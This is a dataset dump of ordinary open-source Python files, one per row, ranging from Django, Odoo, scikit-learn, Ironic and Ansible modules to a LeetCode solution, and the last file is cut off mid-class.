repo_name
stringlengths 5
100
| ref
stringlengths 12
67
| path
stringlengths 4
244
| copies
stringlengths 1
8
| content
stringlengths 0
1.05M
⌀ |
---|---|---|---|---|
GbalsaC/bitnamiP | refs/heads/master | venv/lib/python2.7/site-packages/moto/route53/models.py | 3 | from moto.core import BaseBackend
from moto.core.utils import get_random_hex
class FakeZone(object):
def __init__(self, name, id):
self.name = name
self.id = id
self.rrsets = {}
def add_rrset(self, name, rrset):
self.rrsets[name] = rrset
def delete_rrset(self, name):
self.rrsets.pop(name, None)
class Route53Backend(BaseBackend):
def __init__(self):
self.zones = {}
def create_hosted_zone(self, name):
new_id = get_random_hex()
new_zone = FakeZone(name, new_id)
self.zones[new_id] = new_zone
return new_zone
def get_all_hosted_zones(self):
return self.zones.values()
def get_hosted_zone(self, id):
return self.zones.get(id)
def delete_hosted_zone(self, id):
zone = self.zones.get(id)
if zone:
del self.zones[id]
return zone
return None
route53_backend = Route53Backend()
|
2013Commons/hue | refs/heads/master | desktop/core/ext-py/Django-1.4.5/tests/regressiontests/localflavor/ch/tests.py | 33 | from django.contrib.localflavor.ch.forms import (CHZipCodeField,
CHPhoneNumberField, CHIdentityCardNumberField, CHStateSelect)
from django.test import SimpleTestCase
class CHLocalFlavorTests(SimpleTestCase):
def test_CHStateSelect(self):
f = CHStateSelect()
out = u'''<select name="state">
<option value="AG" selected="selected">Aargau</option>
<option value="AI">Appenzell Innerrhoden</option>
<option value="AR">Appenzell Ausserrhoden</option>
<option value="BS">Basel-Stadt</option>
<option value="BL">Basel-Land</option>
<option value="BE">Berne</option>
<option value="FR">Fribourg</option>
<option value="GE">Geneva</option>
<option value="GL">Glarus</option>
<option value="GR">Graubuenden</option>
<option value="JU">Jura</option>
<option value="LU">Lucerne</option>
<option value="NE">Neuchatel</option>
<option value="NW">Nidwalden</option>
<option value="OW">Obwalden</option>
<option value="SH">Schaffhausen</option>
<option value="SZ">Schwyz</option>
<option value="SO">Solothurn</option>
<option value="SG">St. Gallen</option>
<option value="TG">Thurgau</option>
<option value="TI">Ticino</option>
<option value="UR">Uri</option>
<option value="VS">Valais</option>
<option value="VD">Vaud</option>
<option value="ZG">Zug</option>
<option value="ZH">Zurich</option>
</select>'''
self.assertHTMLEqual(f.render('state', 'AG'), out)
def test_CHZipCodeField(self):
error_format = [u'Enter a zip code in the format XXXX.']
valid = {
'1234': '1234',
'0000': '0000',
}
invalid = {
'800x': error_format,
'80 00': error_format,
}
self.assertFieldOutput(CHZipCodeField, valid, invalid)
def test_CHPhoneNumberField(self):
error_format = [u'Phone numbers must be in 0XX XXX XX XX format.']
valid = {
'012 345 67 89': '012 345 67 89',
'0123456789': '012 345 67 89',
}
invalid = {
'01234567890': error_format,
'1234567890': error_format,
}
self.assertFieldOutput(CHPhoneNumberField, valid, invalid)
def test_CHIdentityCardNumberField(self):
error_format = [u'Enter a valid Swiss identity or passport card number in X1234567<0 or 1234567890 format.']
valid = {
'C1234567<0': 'C1234567<0',
'2123456700': '2123456700',
}
invalid = {
'C1234567<1': error_format,
'2123456701': error_format,
}
self.assertFieldOutput(CHIdentityCardNumberField, valid, invalid)
|
numerigraphe/odoo | refs/heads/8.0 | addons/warning/warning.py | 243 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import fields,osv
from openerp.tools.translate import _
WARNING_MESSAGE = [
('no-message','No Message'),
('warning','Warning'),
('block','Blocking Message')
]
WARNING_HELP = _('Selecting the "Warning" option will notify user with the message, Selecting "Blocking Message" will throw an exception with the message and block the flow. The Message has to be written in the next field.')
class res_partner(osv.osv):
_inherit = 'res.partner'
_columns = {
'sale_warn' : fields.selection(WARNING_MESSAGE, 'Sales Order', help=WARNING_HELP, required=True),
'sale_warn_msg' : fields.text('Message for Sales Order'),
'purchase_warn' : fields.selection(WARNING_MESSAGE, 'Purchase Order', help=WARNING_HELP, required=True),
'purchase_warn_msg' : fields.text('Message for Purchase Order'),
'picking_warn' : fields.selection(WARNING_MESSAGE, 'Stock Picking', help=WARNING_HELP, required=True),
'picking_warn_msg' : fields.text('Message for Stock Picking'),
'invoice_warn' : fields.selection(WARNING_MESSAGE, 'Invoice', help=WARNING_HELP, required=True),
'invoice_warn_msg' : fields.text('Message for Invoice'),
}
_defaults = {
'sale_warn' : 'no-message',
'purchase_warn' : 'no-message',
'picking_warn' : 'no-message',
'invoice_warn' : 'no-message',
}
class sale_order(osv.osv):
_inherit = 'sale.order'
def onchange_partner_id(self, cr, uid, ids, part, context=None):
if not part:
return {'value':{'partner_invoice_id': False, 'partner_shipping_id':False, 'payment_term' : False}}
warning = {}
title = False
message = False
partner = self.pool.get('res.partner').browse(cr, uid, part, context=context)
if partner.sale_warn != 'no-message':
title = _("Warning for %s") % partner.name
message = partner.sale_warn_msg
warning = {
'title': title,
'message': message,
}
if partner.sale_warn == 'block':
return {'value': {'partner_id': False}, 'warning': warning}
result = super(sale_order, self).onchange_partner_id(cr, uid, ids, part, context=context)
if result.get('warning',False):
warning['title'] = title and title +' & '+ result['warning']['title'] or result['warning']['title']
warning['message'] = message and message + ' ' + result['warning']['message'] or result['warning']['message']
if warning:
result['warning'] = warning
return result
class purchase_order(osv.osv):
_inherit = 'purchase.order'
def onchange_partner_id(self, cr, uid, ids, part, context=None):
if not part:
return {'value':{'partner_address_id': False}}
warning = {}
title = False
message = False
partner = self.pool.get('res.partner').browse(cr, uid, part, context=context)
if partner.purchase_warn != 'no-message':
title = _("Warning for %s") % partner.name
message = partner.purchase_warn_msg
warning = {
'title': title,
'message': message
}
if partner.purchase_warn == 'block':
return {'value': {'partner_id': False}, 'warning': warning}
result = super(purchase_order, self).onchange_partner_id(cr, uid, ids, part, context=context)
if result.get('warning',False):
warning['title'] = title and title +' & '+ result['warning']['title'] or result['warning']['title']
warning['message'] = message and message + ' ' + result['warning']['message'] or result['warning']['message']
if warning:
result['warning'] = warning
return result
class account_invoice(osv.osv):
_inherit = 'account.invoice'
def onchange_partner_id(self, cr, uid, ids, type, partner_id,
date_invoice=False, payment_term=False,
partner_bank_id=False, company_id=False,
context=None):
if not partner_id:
return {'value': {
'account_id': False,
'payment_term': False,
}
}
warning = {}
title = False
message = False
partner = self.pool.get('res.partner').browse(cr, uid, partner_id, context=context)
if partner.invoice_warn != 'no-message':
title = _("Warning for %s") % partner.name
message = partner.invoice_warn_msg
warning = {
'title': title,
'message': message
}
if partner.invoice_warn == 'block':
return {'value': {'partner_id': False}, 'warning': warning}
result = super(account_invoice, self).onchange_partner_id(cr, uid, ids, type, partner_id,
date_invoice=date_invoice, payment_term=payment_term,
partner_bank_id=partner_bank_id, company_id=company_id, context=context)
if result.get('warning',False):
warning['title'] = title and title +' & '+ result['warning']['title'] or result['warning']['title']
warning['message'] = message and message + ' ' + result['warning']['message'] or result['warning']['message']
if warning:
result['warning'] = warning
return result
class stock_picking(osv.osv):
_inherit = 'stock.picking'
def onchange_partner_in(self, cr, uid, ids, partner_id=None, context=None):
if not partner_id:
return {}
partner = self.pool.get('res.partner').browse(cr, uid, partner_id, context=context)
warning = {}
title = False
message = False
if partner.picking_warn != 'no-message':
title = _("Warning for %s") % partner.name
message = partner.picking_warn_msg
warning = {
'title': title,
'message': message
}
if partner.picking_warn == 'block':
return {'value': {'partner_id': False}, 'warning': warning}
result = {'value': {}}
if warning:
result['warning'] = warning
return result
class product_product(osv.osv):
_inherit = 'product.template'
_columns = {
'sale_line_warn' : fields.selection(WARNING_MESSAGE,'Sales Order Line', help=WARNING_HELP, required=True),
'sale_line_warn_msg' : fields.text('Message for Sales Order Line'),
'purchase_line_warn' : fields.selection(WARNING_MESSAGE,'Purchase Order Line', help=WARNING_HELP, required=True),
'purchase_line_warn_msg' : fields.text('Message for Purchase Order Line'),
}
_defaults = {
'sale_line_warn' : 'no-message',
'purchase_line_warn' : 'no-message',
}
class sale_order_line(osv.osv):
_inherit = 'sale.order.line'
def product_id_change_with_wh(self, cr, uid, ids, pricelist, product, qty=0,
uom=False, qty_uos=0, uos=False, name='', partner_id=False,
lang=False, update_tax=True, date_order=False, packaging=False,
fiscal_position=False, flag=False, warehouse_id=False, context=None):
warning = {}
if not product:
return {'value': {'th_weight' : 0, 'product_packaging': False,
'product_uos_qty': qty}, 'domain': {'product_uom': [],
'product_uos': []}}
product_obj = self.pool.get('product.product')
product_info = product_obj.browse(cr, uid, product)
title = False
message = False
if product_info.sale_line_warn != 'no-message':
title = _("Warning for %s") % product_info.name
message = product_info.sale_line_warn_msg
warning['title'] = title
warning['message'] = message
if product_info.sale_line_warn == 'block':
return {'value': {'product_id': False}, 'warning': warning}
result = super(sale_order_line, self).product_id_change_with_wh( cr, uid, ids, pricelist, product, qty,
uom, qty_uos, uos, name, partner_id,
lang, update_tax, date_order, packaging, fiscal_position, flag, warehouse_id=warehouse_id, context=context)
if result.get('warning',False):
warning['title'] = title and title +' & '+result['warning']['title'] or result['warning']['title']
warning['message'] = message and message +'\n\n'+result['warning']['message'] or result['warning']['message']
if warning:
result['warning'] = warning
return result
class purchase_order_line(osv.osv):
_inherit = 'purchase.order.line'
def onchange_product_id(self,cr, uid, ids, pricelist, product, qty, uom,
partner_id, date_order=False, fiscal_position_id=False, date_planned=False,
name=False, price_unit=False, state='draft', context=None):
warning = {}
if not product:
return {'value': {'price_unit': price_unit or 0.0, 'name': name or '', 'product_uom' : uom or False}, 'domain':{'product_uom':[]}}
product_obj = self.pool.get('product.product')
product_info = product_obj.browse(cr, uid, product)
title = False
message = False
if product_info.purchase_line_warn != 'no-message':
title = _("Warning for %s") % product_info.name
message = product_info.purchase_line_warn_msg
warning['title'] = title
warning['message'] = message
if product_info.purchase_line_warn == 'block':
return {'value': {'product_id': False}, 'warning': warning}
result = super(purchase_order_line, self).onchange_product_id(cr, uid, ids, pricelist, product, qty, uom,
partner_id, date_order=date_order, fiscal_position_id=fiscal_position_id, date_planned=date_planned, name=name, price_unit=price_unit, state=state, context=context)
if result.get('warning',False):
warning['title'] = title and title +' & '+result['warning']['title'] or result['warning']['title']
warning['message'] = message and message +'\n\n'+result['warning']['message'] or result['warning']['message']
if warning:
result['warning'] = warning
return result
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
anntzer/scikit-learn | refs/heads/main | asv_benchmarks/benchmarks/metrics.py | 12 | from sklearn.metrics.pairwise import pairwise_distances
from .common import Benchmark
from .datasets import _random_dataset
class PairwiseDistancesBenchmark(Benchmark):
"""
Benchmarks for pairwise distances.
"""
param_names = ['representation', 'metric', 'n_jobs']
params = (['dense', 'sparse'],
['cosine', 'euclidean', 'manhattan', 'correlation'],
Benchmark.n_jobs_vals)
def setup(self, *params):
representation, metric, n_jobs = params
if representation == 'sparse' and metric == 'correlation':
raise NotImplementedError
if Benchmark.data_size == 'large':
if metric in ('manhattan', 'correlation'):
n_samples = 8000
else:
n_samples = 24000
else:
if metric in ('manhattan', 'correlation'):
n_samples = 4000
else:
n_samples = 12000
data = _random_dataset(n_samples=n_samples,
representation=representation)
self.X, self.X_val, self.y, self.y_val = data
self.pdist_params = {'metric': metric,
'n_jobs': n_jobs}
def time_pairwise_distances(self, *args):
pairwise_distances(self.X, **self.pdist_params)
def peakmem_pairwise_distances(self, *args):
pairwise_distances(self.X, **self.pdist_params)
|
michelts/lettuce | refs/heads/master | tests/integration/lib/Django-1.3/django/core/management/commands/reset.py | 229 | from optparse import make_option
from django.conf import settings
from django.core.management.base import AppCommand, CommandError
from django.core.management.color import no_style
from django.core.management.sql import sql_reset
from django.db import connections, transaction, DEFAULT_DB_ALIAS
class Command(AppCommand):
option_list = AppCommand.option_list + (
make_option('--noinput', action='store_false', dest='interactive', default=True,
help='Tells Django to NOT prompt the user for input of any kind.'),
make_option('--database', action='store', dest='database',
default=DEFAULT_DB_ALIAS, help='Nominates a database to reset. '
'Defaults to the "default" database.'),
)
help = "Executes ``sqlreset`` for the given app(s) in the current database."
args = '[appname ...]'
output_transaction = True
def handle_app(self, app, **options):
# This command breaks a lot and should be deprecated
import warnings
warnings.warn(
'This command has been deprecated. The command ``flush`` can be used to delete everything. You can also use ALTER TABLE or DROP TABLE statements manually.',
PendingDeprecationWarning
)
using = options.get('database', DEFAULT_DB_ALIAS)
connection = connections[using]
app_name = app.__name__.split('.')[-2]
self.style = no_style()
sql_list = sql_reset(app, self.style, connection)
if options.get('interactive'):
confirm = raw_input("""
You have requested a database reset.
This will IRREVERSIBLY DESTROY any data for
the "%s" application in the database "%s".
Are you sure you want to do this?
Type 'yes' to continue, or 'no' to cancel: """ % (app_name, connection.settings_dict['NAME']))
else:
confirm = 'yes'
if confirm == 'yes':
try:
cursor = connection.cursor()
for sql in sql_list:
cursor.execute(sql)
except Exception, e:
transaction.rollback_unless_managed()
raise CommandError("""Error: %s couldn't be reset. Possible reasons:
* The database isn't running or isn't configured correctly.
* At least one of the database tables doesn't exist.
* The SQL was invalid.
Hint: Look at the output of 'django-admin.py sqlreset %s'. That's the SQL this command wasn't able to run.
The full error: %s""" % (app_name, app_name, e))
transaction.commit_unless_managed()
else:
print "Reset cancelled."
|
tomsimonart/GLM-web-interface | refs/heads/master | pluginstall.py | 1 | #!/usr/bin/env python3
print('plugin installer, TBC')
|
MattDevo/edk2 | refs/heads/master | AppPkg/Applications/Python/Python-2.7.2/Tools/pybench/Imports.py | 6 | from pybench import Test
# First imports:
import os
import package.submodule
class SecondImport(Test):
version = 2.0
operations = 5 * 5
rounds = 40000
def test(self):
for i in xrange(self.rounds):
import os
import os
import os
import os
import os
import os
import os
import os
import os
import os
import os
import os
import os
import os
import os
import os
import os
import os
import os
import os
import os
import os
import os
import os
import os
def calibrate(self):
for i in xrange(self.rounds):
pass
class SecondPackageImport(Test):
version = 2.0
operations = 5 * 5
rounds = 40000
def test(self):
for i in xrange(self.rounds):
import package
import package
import package
import package
import package
import package
import package
import package
import package
import package
import package
import package
import package
import package
import package
import package
import package
import package
import package
import package
import package
import package
import package
import package
import package
def calibrate(self):
for i in xrange(self.rounds):
pass
class SecondSubmoduleImport(Test):
version = 2.0
operations = 5 * 5
rounds = 40000
def test(self):
for i in xrange(self.rounds):
import package.submodule
import package.submodule
import package.submodule
import package.submodule
import package.submodule
import package.submodule
import package.submodule
import package.submodule
import package.submodule
import package.submodule
import package.submodule
import package.submodule
import package.submodule
import package.submodule
import package.submodule
import package.submodule
import package.submodule
import package.submodule
import package.submodule
import package.submodule
import package.submodule
import package.submodule
import package.submodule
import package.submodule
import package.submodule
def calibrate(self):
for i in xrange(self.rounds):
pass
|
concurrence/concurrence | refs/heads/master | lib/concurrence/http/__init__.py | 1 | # Copyright (C) 2009, Hyves (Startphone Ltd.)
#
# This module is part of the Concurrence Framework and is released under
# the New BSD License: http://www.opensource.org/licenses/bsd-license.php
class HTTPError(Exception): pass
class HTTPRequest(object):
"""A class representing a HTTP request."""
def __init__(self, path = None, method = None, host = None):
"""Create a new http request for *path* using *method* to *host*."""
self.path = path
self.method = method
self.host = host
self.headers = []
self._body = None
def add_header(self, key, value):
"""Adds a new header to the request with name *key* and given *value*."""
self.headers.append((key, value))
def _set_body(self, body):
if body is not None:
assert type(body) == str
self.add_header('Content_length', len(body))
self._body = body
def _get_body(self):
return self._body
body = property(_get_body, _set_body, doc = 'sets *body* data for the request')
class HTTPResponse(object):
"""Represents a HTTP Response."""
def __init__(self):
self.headers = []
self.status = ''
self.iter = None
@property
def status_code(self):
"""Returns the HTTP response code as an integer."""
return int(self.status.split()[1])
@property
def status_reason(self):
"""Returns the reason part of the HTTP response line as a string."""
return self.status.split()[2]
def get_header(self, key, default = None):
"""Gets the HTTP response header with the given case-insensitive *key*. Returns *default*
if the header is not found."""
key = key.lower()
for (_key, value) in self.headers:
if key == _key.lower():
return value
return default
def add_header(self, key, value):
"""Adds a new header to the response with name *key* and given *value*."""
self.headers.append((key, value))
@property
def body(self):
"""Returns the body of the response as a string."""
return ''.join(list(self.iter))
def __iter__(self):
return iter(self.iter)
from concurrence.http.server import WSGIServer
from concurrence.http.client import HTTPConnection
|
Chasego/codirit | refs/heads/master | leetcode/202-Happy-Number/solution.py | 4 | class Solution:
def isHappy(self, n: int) -> bool:
visited = set([n])
while n != 1:
new_n = 0
while n > 0:
new_n += (n % 10) ** 2
n = int(n/10)
if new_n in visited:
return False
visited.add(new_n)
n = new_n
return True
|
redhat-openstack/ironic | refs/heads/master-patches | ironic/tests/api/v1/test_utils.py | 2 | # -*- encoding: utf-8 -*-
# Copyright 2013 Red Hat, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from oslo_config import cfg
from oslo_utils import uuidutils
import pecan
from six.moves import http_client
from webob.static import FileIter
import wsme
from ironic.api.controllers.v1 import utils
from ironic.common import exception
from ironic import objects
from ironic.tests.api import utils as test_api_utils
from ironic.tests import base
CONF = cfg.CONF
class TestApiUtils(base.TestCase):
def test_validate_limit(self):
limit = utils.validate_limit(10)
self.assertEqual(10, 10)
# max limit
limit = utils.validate_limit(999999999)
self.assertEqual(CONF.api.max_limit, limit)
# negative
self.assertRaises(wsme.exc.ClientSideError, utils.validate_limit, -1)
# zero
self.assertRaises(wsme.exc.ClientSideError, utils.validate_limit, 0)
def test_validate_sort_dir(self):
sort_dir = utils.validate_sort_dir('asc')
self.assertEqual('asc', sort_dir)
# invalid sort_dir parameter
self.assertRaises(wsme.exc.ClientSideError,
utils.validate_sort_dir,
'fake-sort')
def test_check_for_invalid_fields(self):
requested = ['field_1', 'field_3']
supported = ['field_1', 'field_2', 'field_3']
utils.check_for_invalid_fields(requested, supported)
def test_check_for_invalid_fields_fail(self):
requested = ['field_1', 'field_4']
supported = ['field_1', 'field_2', 'field_3']
self.assertRaises(exception.InvalidParameterValue,
utils.check_for_invalid_fields,
requested, supported)
@mock.patch.object(pecan, 'request', spec_set=['version'])
def test_check_allow_specify_fields(self, mock_request):
mock_request.version.minor = 8
self.assertIsNone(utils.check_allow_specify_fields(['foo']))
@mock.patch.object(pecan, 'request', spec_set=['version'])
def test_check_allow_specify_fields_fail(self, mock_request):
mock_request.version.minor = 7
self.assertRaises(exception.NotAcceptable,
utils.check_allow_specify_fields, ['foo'])
@mock.patch.object(pecan, 'request', spec_set=['version'])
def test_allow_links_node_states_and_driver_properties(self, mock_request):
mock_request.version.minor = 14
self.assertTrue(utils.allow_links_node_states_and_driver_properties())
mock_request.version.minor = 10
self.assertFalse(utils.allow_links_node_states_and_driver_properties())
class TestNodeIdent(base.TestCase):
def setUp(self):
super(TestNodeIdent, self).setUp()
self.valid_name = 'my-host'
self.valid_uuid = uuidutils.generate_uuid()
self.invalid_name = 'Mr Plow'
self.node = test_api_utils.post_get_test_node()
@mock.patch.object(pecan, 'request')
def test_allow_node_logical_names_pre_name(self, mock_pecan_req):
mock_pecan_req.version.minor = 1
self.assertFalse(utils.allow_node_logical_names())
@mock.patch.object(pecan, 'request')
def test_allow_node_logical_names_post_name(self, mock_pecan_req):
mock_pecan_req.version.minor = 5
self.assertTrue(utils.allow_node_logical_names())
@mock.patch("pecan.request")
def test_is_valid_node_name(self, mock_pecan_req):
mock_pecan_req.version.minor = 10
self.assertTrue(utils.is_valid_node_name(self.valid_name))
self.assertFalse(utils.is_valid_node_name(self.invalid_name))
self.assertFalse(utils.is_valid_node_name(self.valid_uuid))
@mock.patch.object(pecan, 'request')
@mock.patch.object(utils, 'allow_node_logical_names')
@mock.patch.object(objects.Node, 'get_by_uuid')
@mock.patch.object(objects.Node, 'get_by_name')
def test_get_rpc_node_expect_uuid(self, mock_gbn, mock_gbu, mock_anln,
mock_pr):
mock_anln.return_value = True
self.node['uuid'] = self.valid_uuid
mock_gbu.return_value = self.node
self.assertEqual(self.node, utils.get_rpc_node(self.valid_uuid))
self.assertEqual(1, mock_gbu.call_count)
self.assertEqual(0, mock_gbn.call_count)
@mock.patch.object(pecan, 'request')
@mock.patch.object(utils, 'allow_node_logical_names')
@mock.patch.object(objects.Node, 'get_by_uuid')
@mock.patch.object(objects.Node, 'get_by_name')
def test_get_rpc_node_expect_name(self, mock_gbn, mock_gbu, mock_anln,
mock_pr):
mock_pr.version.minor = 10
mock_anln.return_value = True
self.node['name'] = self.valid_name
mock_gbn.return_value = self.node
self.assertEqual(self.node, utils.get_rpc_node(self.valid_name))
self.assertEqual(0, mock_gbu.call_count)
self.assertEqual(1, mock_gbn.call_count)
@mock.patch.object(pecan, 'request')
@mock.patch.object(utils, 'allow_node_logical_names')
@mock.patch.object(objects.Node, 'get_by_uuid')
@mock.patch.object(objects.Node, 'get_by_name')
def test_get_rpc_node_invalid_name(self, mock_gbn, mock_gbu,
mock_anln, mock_pr):
mock_pr.version.minor = 10
mock_anln.return_value = True
self.assertRaises(exception.InvalidUuidOrName,
utils.get_rpc_node,
self.invalid_name)
@mock.patch.object(pecan, 'request')
@mock.patch.object(utils, 'allow_node_logical_names')
@mock.patch.object(objects.Node, 'get_by_uuid')
@mock.patch.object(objects.Node, 'get_by_name')
def test_get_rpc_node_by_uuid_no_logical_name(self, mock_gbn, mock_gbu,
mock_anln, mock_pr):
# allow_node_logical_name() should have no effect
mock_anln.return_value = False
self.node['uuid'] = self.valid_uuid
mock_gbu.return_value = self.node
self.assertEqual(self.node, utils.get_rpc_node(self.valid_uuid))
self.assertEqual(1, mock_gbu.call_count)
self.assertEqual(0, mock_gbn.call_count)
@mock.patch.object(pecan, 'request')
@mock.patch.object(utils, 'allow_node_logical_names')
@mock.patch.object(objects.Node, 'get_by_uuid')
@mock.patch.object(objects.Node, 'get_by_name')
def test_get_rpc_node_by_name_no_logical_name(self, mock_gbn, mock_gbu,
mock_anln, mock_pr):
mock_anln.return_value = False
self.node['name'] = self.valid_name
mock_gbn.return_value = self.node
self.assertRaises(exception.NodeNotFound,
utils.get_rpc_node,
self.valid_name)
class TestVendorPassthru(base.TestCase):
def test_method_not_specified(self):
self.assertRaises(wsme.exc.ClientSideError,
utils.vendor_passthru, 'fake-ident',
None, 'fake-topic', data='fake-data')
@mock.patch.object(pecan, 'request',
spec_set=['method', 'context', 'rpcapi'])
def _vendor_passthru(self, mock_request, async=True,
driver_passthru=False):
return_value = {'return': 'SpongeBob', 'async': async, 'attach': False}
mock_request.method = 'post'
mock_request.context = 'fake-context'
passthru_mock = None
if driver_passthru:
passthru_mock = mock_request.rpcapi.driver_vendor_passthru
else:
passthru_mock = mock_request.rpcapi.vendor_passthru
passthru_mock.return_value = return_value
response = utils.vendor_passthru('fake-ident', 'squarepants',
'fake-topic', data='fake-data',
driver_passthru=driver_passthru)
passthru_mock.assert_called_once_with(
'fake-context', 'fake-ident', 'squarepants', 'POST',
'fake-data', 'fake-topic')
self.assertIsInstance(response, wsme.api.Response)
self.assertEqual('SpongeBob', response.obj)
self.assertEqual(response.return_type, wsme.types.Unset)
sc = http_client.ACCEPTED if async else http_client.OK
self.assertEqual(sc, response.status_code)
def test_vendor_passthru_async(self):
self._vendor_passthru()
def test_vendor_passthru_sync(self):
self._vendor_passthru(async=False)
def test_driver_vendor_passthru_async(self):
self._vendor_passthru(driver_passthru=True)
def test_driver_vendor_passthru_sync(self):
self._vendor_passthru(async=False, driver_passthru=True)
@mock.patch.object(pecan, 'response', spec_set=['app_iter'])
@mock.patch.object(pecan, 'request',
spec_set=['method', 'context', 'rpcapi'])
def _test_vendor_passthru_attach(self, return_value, expct_return_value,
mock_request, mock_response):
return_ = {'return': return_value, 'async': False, 'attach': True}
mock_request.method = 'get'
mock_request.context = 'fake-context'
mock_request.rpcapi.driver_vendor_passthru.return_value = return_
response = utils.vendor_passthru('fake-ident', 'bar',
'fake-topic', data='fake-data',
driver_passthru=True)
mock_request.rpcapi.driver_vendor_passthru.assert_called_once_with(
'fake-context', 'fake-ident', 'bar', 'GET',
'fake-data', 'fake-topic')
# Assert file was attached to the response object
self.assertIsInstance(mock_response.app_iter, FileIter)
self.assertEqual(expct_return_value,
mock_response.app_iter.file.read())
# Assert response message is none
self.assertIsInstance(response, wsme.api.Response)
self.assertIsNone(response.obj)
self.assertIsNone(response.return_type)
self.assertEqual(http_client.OK, response.status_code)
def test_vendor_passthru_attach(self):
self._test_vendor_passthru_attach('foo', b'foo')
def test_vendor_passthru_attach_unicode_to_byte(self):
self._test_vendor_passthru_attach(u'não', b'n\xc3\xa3o')
def test_vendor_passthru_attach_byte_to_byte(self):
self._test_vendor_passthru_attach(b'\x00\x01', b'\x00\x01')
|
richardcs/ansible | refs/heads/devel | lib/ansible/modules/cloud/vultr/vultr_startup_script_facts.py | 27 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# (c) 2018, Yanis Guenane <[email protected]>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = r'''
---
module: vultr_startup_script_facts
short_description: Gather facts about the Vultr startup scripts available.
description:
- Gather facts about vultr_startup_scripts available.
version_added: "2.7"
author: "Yanis Guenane (@Spredzy)"
extends_documentation_fragment: vultr
'''
EXAMPLES = r'''
- name: Gather Vultr startup scripts facts
local_action:
module: vultr_startup_script_facts
- name: Print the gathered facts
debug:
var: ansible_facts.vultr_startup_script_facts
'''
RETURN = r'''
---
vultr_api:
description: Response from Vultr API with a few additions/modification
returned: success
type: complex
contains:
api_account:
description: Account used in the ini file to select the key
returned: success
type: string
sample: default
api_timeout:
description: Timeout used for the API requests
returned: success
type: int
sample: 60
api_retries:
description: Amount of max retries for the API requests
returned: success
type: int
sample: 5
api_endpoint:
description: Endpoint used for the API requests
returned: success
type: string
sample: "https://api.vultr.com"
vultr_startup_script_facts:
description: Response from Vultr API
returned: success
type: complex
contains:
"vultr_startup_script_facts": [
{
"date_created": "2018-07-19 08:38:36",
"date_modified": "2018-07-19 08:38:36",
"id": 327133,
"name": "lolo",
"script": "#!/bin/bash\necho Hello World > /root/hello",
"type": "boot"
}
]
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.vultr import (
Vultr,
vultr_argument_spec,
)
class AnsibleVultrStartupScriptFacts(Vultr):
def __init__(self, module):
super(AnsibleVultrStartupScriptFacts, self).__init__(module, "vultr_startup_script_facts")
self.returns = {
"SCRIPTID": dict(key='id', convert_to='int'),
"date_created": dict(),
"date_modified": dict(),
"name": dict(),
"script": dict(),
"type": dict(),
}
def get_startupscripts(self):
return self.api_query(path="/v1/startupscript/list")
def parse_startupscript_list(startupscipts_list):
if not startupscipts_list:
return []
return [startupscript for id, startupscript in startupscipts_list.items()]
def main():
argument_spec = vultr_argument_spec()
module = AnsibleModule(
argument_spec=argument_spec,
supports_check_mode=True,
)
startupscript_facts = AnsibleVultrStartupScriptFacts(module)
result = startupscript_facts.get_result(parse_startupscript_list(startupscript_facts.get_startupscripts()))
ansible_facts = {
'vultr_startup_script_facts': result['vultr_startup_script_facts']
}
module.exit_json(ansible_facts=ansible_facts, **result)
if __name__ == '__main__':
main()
|
louietsai/python-for-android | refs/heads/master | python3-alpha/extra_modules/gdata/finance/data.py | 125 | #!/usr/bin/python
#
# Copyright (C) 2009 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Contains the data classes of the Google Finance Portfolio Data API"""
__author__ = '[email protected] (Jeff Scudder)'
import atom.core
import atom.data
import gdata.data
import gdata.opensearch.data
GF_TEMPLATE = '{http://schemas.google.com/finance/2007/}%s'
class Commission(atom.core.XmlElement):
"""Commission for the transaction"""
_qname = GF_TEMPLATE % 'commission'
money = [gdata.data.Money]
class CostBasis(atom.core.XmlElement):
"""Cost basis for the portfolio or position"""
_qname = GF_TEMPLATE % 'costBasis'
money = [gdata.data.Money]
class DaysGain(atom.core.XmlElement):
"""Today's gain for the portfolio or position"""
_qname = GF_TEMPLATE % 'daysGain'
money = [gdata.data.Money]
class Gain(atom.core.XmlElement):
"""Total gain for the portfolio or position"""
_qname = GF_TEMPLATE % 'gain'
money = [gdata.data.Money]
class MarketValue(atom.core.XmlElement):
"""Market value for the portfolio or position"""
_qname = GF_TEMPLATE % 'marketValue'
money = [gdata.data.Money]
class PortfolioData(atom.core.XmlElement):
"""Data for the portfolio"""
_qname = GF_TEMPLATE % 'portfolioData'
return_overall = 'returnOverall'
currency_code = 'currencyCode'
return3y = 'return3y'
return4w = 'return4w'
market_value = MarketValue
return_y_t_d = 'returnYTD'
cost_basis = CostBasis
gain_percentage = 'gainPercentage'
days_gain = DaysGain
return3m = 'return3m'
